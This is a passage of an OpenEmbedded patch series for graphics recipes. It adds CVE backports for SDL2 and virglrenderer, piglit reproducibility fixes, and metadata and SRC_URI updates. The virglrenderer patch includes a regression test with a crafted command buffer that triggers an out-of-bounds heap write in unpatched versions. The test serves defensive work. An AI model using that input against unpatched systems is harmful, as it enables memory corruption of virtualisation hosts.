+diff --git a/src/video/SDL_pixels.c b/src/video/SDL_pixels.c
+index ac04533c5d5..9bb02f771d0 100644
+--- a/src/video/SDL_pixels.c
++++ b/src/video/SDL_pixels.c
+@@ -947,7 +947,7 @@ Map1to1(SDL_Palette * src, SDL_Palette * dst, int *identical)
+ }
+ *identical = 0;
+ }
+- map = (Uint8 *) SDL_malloc(src->ncolors);
++ map = (Uint8 *) SDL_calloc(256, sizeof(Uint8));
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
+@@ -971,7 +971,7 @@ Map1toN(SDL_PixelFormat * src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,
+ SDL_Palette *pal = src->palette;
+
+ bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);
+- map = (Uint8 *) SDL_malloc(pal->ncolors * bpp);
++ map = (Uint8 *) SDL_calloc(256, bpp);
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
new file mode 100644
index 0000000000..b02a2169a6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
@@ -0,0 +1,38 @@
+From 00b67f55727bc0944c3266e2b875440da132ce4b Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Wed, 21 Sep 2022 10:30:38 +0800
+Subject: [PATCH] Fix potential memory leak in GLES_CreateTexture
+
+
+CVE: CVE-2022-4743
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/00b67f55727bc0944c3266e2b875440da132ce4b.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/render/opengles/SDL_render_gles.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/render/opengles/SDL_render_gles.c b/src/render/opengles/SDL_render_gles.c
+index a5fbab309eda..ba08a46e2805 100644
+--- a/src/render/opengles/SDL_render_gles.c
++++ b/src/render/opengles/SDL_render_gles.c
+@@ -359,6 +359,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+ renderdata->glGenTextures(1, &data->texture);
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glGenTextures()", result);
+ }
+@@ -387,6 +390,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glTexImage2D()", result);
+ }
diff --git a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
index 1049aa548a..fa29bc99ac 100644
--- a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
+++ b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
@@ -20,6 +20,9 @@ SRC_URI = "http://www.libsdl.org/release/SDL2-${PV}.tar.gz \
file://more-gen-depends.patch \
file://directfb-spurious-curly-brace-missing-e.patch \
file://directfb-renderfillrect-fix.patch \
+ file://CVE-2020-14409-14410.patch \
+ file://CVE-2021-33657.patch \
+ file://CVE-2022-4743.patch \
"
S = "${WORKDIR}/SDL2-${PV}"
@@ -57,7 +60,7 @@ PACKAGECONFIG ??= " \
"
PACKAGECONFIG[alsa] = "--enable-alsa --disable-alsatest,--disable-alsa,alsa-lib,"
PACKAGECONFIG[arm-neon] = "--enable-arm-neon,--disable-arm-neon"
-PACKAGECONFIG[directfb] = "--enable-video-directfb,--disable-video-directfb,directfb"
+PACKAGECONFIG[directfb] = "--enable-video-directfb,--disable-video-directfb,directfb,directfb"
PACKAGECONFIG[gles2] = "--enable-video-opengles,--disable-video-opengles,virtual/libgles2"
PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
PACKAGECONFIG[kmsdrm] = "--enable-video-kmsdrm,--disable-video-kmsdrm,libdrm virtual/libgbm"
diff --git a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
index 03b38027a1..f14ed0f52b 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
-SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch"
+SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https"
SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce..3ea67d09d6 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
# SRCREV tagged 1.2.2
SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
-SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \
+SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
file://0001-Fix-build-with-gcc-10.patch \
file://kbdconfig"
diff --git a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
index cd35a1f850..a64f2faa85 100644
--- a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
+++ b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
@@ -6,6 +6,21 @@ Subject: [PATCH] meson.build: make TLS ELF optional
USE_ELF_TLS has replaced GLX_USE_TLS so this patch is the original "make
TLS GLX optional again" patch updated to the latest mesa.
+For details, see:
+https://gitlab.freedesktop.org/mesa/mesa/-/issues/966
+
+This prevents runtime segfault on musl:
+
+Traceback (most recent call last):
+ File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/core/decorator/__init__.py", line 36, in wrapped_f
+ return func(*args, **kwargs)
+ File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/runtime/cases/parselogs.py", line 378, in test_parselogs
+ self.assertEqual(errcount, 0, msg=self.msg)
+AssertionError: 1 != 0 : Log: /home/pokybuild/yocto-worker/musl-qemux86/build/build/tmp/work/qemux86-poky-linux-musl/core-image-sato-sdk/1.0-r0/target_logs/Xorg.0.log
+-----------------------
+Central error: [ 10.477] (EE) Failed to load /usr/lib/xorg/modules/extensions/libglx.so: Error relocating /usr/lib/libGL.so.1: alphasort: initial-exec TLS resolves to dynamic definition in /usr/lib/libGL.so.1
+***********************
+
Upstream-Status: Inappropriate [configuration]
Signed-off-by: Alistair Francis <alistair@alistair23.me>
diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index b7ef496fdc..bfab19e773 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -26,11 +26,6 @@ PROVIDES = " \
inherit meson pkgconfig python3native gettext features_check
-# Unset these to stop python trying to report the target Python setup
-_PYTHON_SYSCONFIGDATA_NAME[unexport] = "1"
-STAGING_INCDIR[unexport] = "1"
-STAGING_LIBDIR[unexport] = "1"
-
BBCLASSEXTEND = "native nativesdk"
ANY_OF_DISTRO_FEATURES_class-target = "opengl vulkan"
@@ -236,7 +231,7 @@ python mesa_populate_packages() {
import re
dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
if os.path.isdir(dri_drivers_root):
- dri_pkgs = os.listdir(dri_drivers_root)
+ dri_pkgs = sorted(os.listdir(dri_drivers_root))
lib_name = d.expand("${MLPREFIX}mesa-megadriver")
for p in dri_pkgs:
m = re.match(r'^(.*)_dri\.so$', p)
diff --git a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
index 4e89d631c3..549b0cbdf7 100644
--- a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
+++ b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Very simple session manager for X"
+DESCRIPTION = "Simple session manager for X, that provides just the right boilerplate to create a session and launch the browser "
HOMEPAGE = "http://www.yoctoproject.org"
BUGTRACKER = "http://bugzilla.pokylinux.org"
diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe..88101b5dcc 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
# Exclude x.99.x versions from upstream checks
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
-SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \
+SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
file://fix-test-includes.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/mx/mx.inc b/meta/recipes-graphics/mx/mx.inc
index 714a06f0af..c977849c96 100644
--- a/meta/recipes-graphics/mx/mx.inc
+++ b/meta/recipes-graphics/mx/mx.inc
@@ -1,4 +1,10 @@
SUMMARY = "Clutter based UI widget library"
+DESCRIPTION = "Mx is a widget toolkit using Clutter that provides a set of standard interface \
+elements, including buttons, progress bars, scroll bars and others. It also \
+implements some standard managers. One other interesting feature is the \
+possibility setting style properties from a CSS format file."
+HOMEPAGE = "https://github.com/clutter-project/mx"
+BUGTRACKER = "https://github.com/clutter-project/mx/issues"
LICENSE = "LGPLv2.1"
inherit clutter autotools features_check gobject-introspection gtk-doc
diff --git a/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
new file mode 100644
index 0000000000..caa48e088d
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
@@ -0,0 +1,27 @@
+From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Sun, 1 Nov 2020 20:08:49 +0000
+Subject: [PATCH] Add a missing include for htobe32 definition
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+index 5f45e0c23..c755ee29a 100644
+--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+@@ -34,6 +34,8 @@
+
+ #include "piglit-util-gl.h"
+
++#include <endian.h>
++
+ #define IMAGE_WIDTH 60
+ #define IMAGE_HEIGHT 60
+
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
new file mode 100644
index 0000000000..cc9482c047
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
@@ -0,0 +1,31 @@
+From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 30 Nov 2020 23:08:22 +0000
+Subject: [PATCH] framework/profile.py: make test lists reproducible
+
+These are created with os.walk, which yields different
+order depending on where it's run.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ framework/profile.py | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/framework/profile.py b/framework/profile.py
+index c210e535e..9b5d51d68 100644
+--- a/framework/profile.py
++++ b/framework/profile.py
+@@ -528,7 +528,11 @@ class TestProfile(object):
+ else:
+ opts[n] = self.test_list[n]
+ else:
+- opts = self.test_list # pylint: disable=redefined-variable-type
++ opts = collections.OrderedDict()
++ test_keys = list(self.test_list.keys())
++ test_keys.sort()
++ for k in test_keys:
++ opts[k] = self.test_list[k]
+
+ for k, v in self.filters.run(opts.items()):
+ yield k, v
diff --git a/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
new file mode 100644
index 0000000000..8704f98500
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
@@ -0,0 +1,44 @@
+From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:12:32 +0000
+Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
+ hardcode the full binary path
+
+This helps reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ generated_tests/gen_tcs_input_tests.py | 2 +-
+ generated_tests/gen_tes_input_tests.py | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
+index face4f19a..e36671af4 100644
+--- a/generated_tests/gen_tcs_input_tests.py
++++ b/generated_tests/gen_tcs_input_tests.py
+@@ -272,7 +272,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
+index 3d847b5cc..954840b20 100644
+--- a/generated_tests/gen_tes_input_tests.py
++++ b/generated_tests/gen_tes_input_tests.py
+@@ -301,7 +301,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
new file mode 100644
index 0000000000..2efba6f866
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
+From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 16 Nov 2020 18:01:02 +0000
+Subject: [PATCH] serializer.py: make .gz files reproducible
+
+.gz format contains mtime of the compressed data, and
+SOURCE_DATE_EPOCH is the standard way to make it reproducuble.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/serializer.py | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tests/serializer.py b/tests/serializer.py
+index bd14bc3db..bc5b45d7f 100644
+--- a/tests/serializer.py
++++ b/tests/serializer.py
+@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
+ et.SubElement(env, 'env', name=k, value=v)
+
+ tree = et.ElementTree(root)
+- with gzip.open(outfile, 'wb') as f:
++ reproducible_mtime = None
++ if 'SOURCE_DATE_EPOCH' in os.environ:
++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
+ tree.write(f, encoding='utf-8', xml_declaration=True)
+
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
new file mode 100644
index 0000000000..8321be8490
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
@@ -0,0 +1,28 @@
+From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Wed, 2 Dec 2020 21:21:52 +0000
+Subject: [PATCH] tests/shader.py: sort the file list before working on it
+
+This allows later xml output to be reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/shader.py | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/tests/shader.py b/tests/shader.py
+index 849273660..e6e65d1ba 100644
+--- a/tests/shader.py
++++ b/tests/shader.py
+@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
+ for group, files in shader_tests.items():
+ assert group not in profile.test_list, 'duplicate group: {}'.format(group)
+
+- # We'll end up with a list of tuples, split that into two lists
++ # This makes the xml output reproducible, as os.walk() order is random
++ files.sort()
++ # We'll end up with a list of tuples, split that into two list
+ files, installedfiles = list(zip(*files))
+ files = list(files)
+ installedfiles = list(installedfiles)
diff --git a/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
new file mode 100644
index 0000000000..16c7c5c803
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
@@ -0,0 +1,30 @@
+From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:13:50 +0000
+Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
+ into target binary
+
+This helps reproducibilty.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/util/piglit-shader.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
+index 4fd68d21e..c9ea8295e 100644
+--- a/tests/util/piglit-shader.c
++++ b/tests/util/piglit-shader.c
+@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
+
+ source_dir = getenv("PIGLIT_SOURCE_DIR");
+ if (source_dir == NULL) {
+- source_dir = SOURCE_DIR;
++ source_dir = ".";
+ }
+
+ snprintf(filename_with_path, FILENAME_MAX - 1,
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 58d10d6b9b..9897ef1575 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -1,16 +1,24 @@
SUMMARY = "OpenGL driver testing framework"
DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \
implementations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/piglit"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
-SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \
file://0001-cmake-install-bash-completions-in-the-right-place.patch \
file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
+ file://0001-Add-a-missing-include-for-htobe32-definition.patch \
+ file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \
+ file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \
+ file://0001-serializer.py-make-.gz-files-reproducible.patch \
+ file://0001-framework-profile.py-make-test-lists-reproducible.patch \
+ file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \
"
UPSTREAM_CHECK_COMMITS = "1"
-SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813"
+SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985"
# (when PV goes above 1.0 remove the trailing r)
PV = "1.0+gitr${SRCPV}"
@@ -35,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/"
PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}"
PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut,"
PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}"
+PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader"
+export PIGLIT_BUILD_DIR = "../../../../git"
do_configure_prepend() {
if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then
diff --git a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
index d10bddb529..f69e4838f4 100644
--- a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
+++ b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
@@ -1,6 +1,9 @@
SUMMARY = "Enables monitoring and display of application startup"
+DESCRIPTION = "Contains a reference implementation of the startup notification protocol. \
+The reference implementation is mostly under an X Window System style license, and has \
+no special dependencies. "
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/"
-BUGTRACKER = "https://bugs.freedesktop.org/enter_bug.cgi?product=Specifications"
+BUGTRACKER = "https://gitlab.freedesktop.org/xdg/startup-notification/-/issues"
# most files are under MIT, but libsn/sn-util.c is under LGPL, the
# effective license is LGPL
diff --git a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
index 3e1ba196b5..b75bd4c51d 100644
--- a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
+++ b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "The Bitstream Vera fonts - TTF Edition"
+HOMEPAGE = "https://www.gnome.org/fonts/"
DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \
faces (normal, oblique, bold, bold oblique) and two serif faces (normal \
and bold). In addition Fontconfig/Xft2 can artificially oblique the \
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
new file mode 100644
index 0000000000..4a277bd4d0
--- /dev/null
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
@@ -0,0 +1,100 @@
+From 95e581fd181b213c2ed7cdc63f2abc03eaaa77ec Mon Sep 17 00:00:00 2001
+From: Gert Wollny <gert.wollny@collabora.com>
+Date: Tue, 30 Nov 2021 10:17:26 +0100
+Subject: [PATCH] vrend: Add test to resource OOB write and fix it
+
+v2: Also check that no depth != 1 has been send when none is due
+
+Closes: #250
+Signed-off-by: Gert Wollny <gert.wollny@collabora.com>
+Reviewed-by: Chia-I Wu <olvaffe@gmail.com>
+
+https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/95e581fd181b213c2ed7cdc63f2abc03eaaa77ec
+Upstream-Status: Backport
+CVE: CVE-2022-0135
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/vrend_renderer.c | 3 +++
+ tests/test_fuzzer_formats.c | 43 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 46 insertions(+)
+
+diff --git a/src/vrend_renderer.c b/src/vrend_renderer.c
+index 28f669727..357b81b20 100644
+--- a/src/vrend_renderer.c
++++ b/src/vrend_renderer.c
+@@ -7833,8 +7833,11 @@ static int vrend_renderer_transfer_write_iov(struct vrend_context *ctx,
+ info->box->height) * elsize;
+ if (res->target == GL_TEXTURE_3D ||
+ res->target == GL_TEXTURE_2D_ARRAY ||
++ res->target == GL_TEXTURE_2D_MULTISAMPLE_ARRAY ||
+ res->target == GL_TEXTURE_CUBE_MAP_ARRAY)
+ send_size *= info->box->depth;
++ else if (need_temp && info->box->depth != 1)
++ return EINVAL;
+
+ if (need_temp) {
+ data = malloc(send_size);
+diff --git a/tests/test_fuzzer_formats.c b/tests/test_fuzzer_formats.c
+index 59d6fb671..2de9a9a3f 100644
+--- a/tests/test_fuzzer_formats.c
++++ b/tests/test_fuzzer_formats.c
+@@ -957,6 +957,48 @@ static void test_vrend_set_signle_abo_heap_overflow() {
+ virgl_renderer_submit_cmd((void *) cmd, ctx_id, 0xde);
+ }
+
++/* Test adapted from yaojun8558363@gmail.com:
++ * https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/250
++*/
++static void test_vrend_3d_resource_overflow() {
++
++ struct virgl_renderer_resource_create_args resource;
++ resource.handle = 0x4c474572;
++ resource.target = PIPE_TEXTURE_2D_ARRAY;
++ resource.format = VIRGL_FORMAT_Z24X8_UNORM;
++ resource.nr_samples = 2;
++ resource.last_level = 0;
++ resource.array_size = 3;
++ resource.bind = VIRGL_BIND_SAMPLER_VIEW;
++ resource.depth = 1;
++ resource.width = 8;
++ resource.height = 4;
++ resource.flags = 0;
++
++ virgl_renderer_resource_create(&resource, NULL, 0);
++ virgl_renderer_ctx_attach_resource(ctx_id, resource.handle);
++
++ uint32_t size = 0x400;
++ uint32_t cmd[size];
++ int i = 0;
++ cmd[i++] = (size - 1) << 16 | 0 << 8 | VIRGL_CCMD_RESOURCE_INLINE_WRITE;
++ cmd[i++] = resource.handle;
++ cmd[i++] = 0; // level
++ cmd[i++] = 0; // usage
++ cmd[i++] = 0; // stride
++ cmd[i++] = 0; // layer_stride
++ cmd[i++] = 0; // x
++ cmd[i++] = 0; // y
++ cmd[i++] = 0; // z
++ cmd[i++] = 8; // w
++ cmd[i++] = 4; // h
++ cmd[i++] = 3; // d
++ memset(&cmd[i], 0, size - i);
++
++ virgl_renderer_submit_cmd((void *) cmd, ctx_id, size);
++}
++
++
+ int main()
+ {
+ initialize_environment();
+@@ -979,6 +1021,7 @@ int main()
+ test_cs_nullpointer_deference();
+ test_vrend_set_signle_abo_heap_overflow();
+
++ test_vrend_3d_resource_overflow();
+
+ virgl_renderer_context_destroy(ctx_id);
+ virgl_renderer_cleanup(&cookie);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 1046b8504f..8185d6f7e8 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,9 +10,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
DEPENDS = "libdrm mesa libepoxy"
SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
-SRC_URI = "git://anongit.freedesktop.org/virglrenderer \
+SRC_URI = "git://anongit.freedesktop.org/git/virglrenderer;branch=master \
file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
file://0001-meson.build-use-python3-directly-for-python.patch \
+ file://CVE-2022-0135.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64d..0774f37e31 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
DEPENDS = "zlib"
-SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \
+SRC_URI = "git://github.com/assimp/assimp.git;nobranch=1;protocol=https \
file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
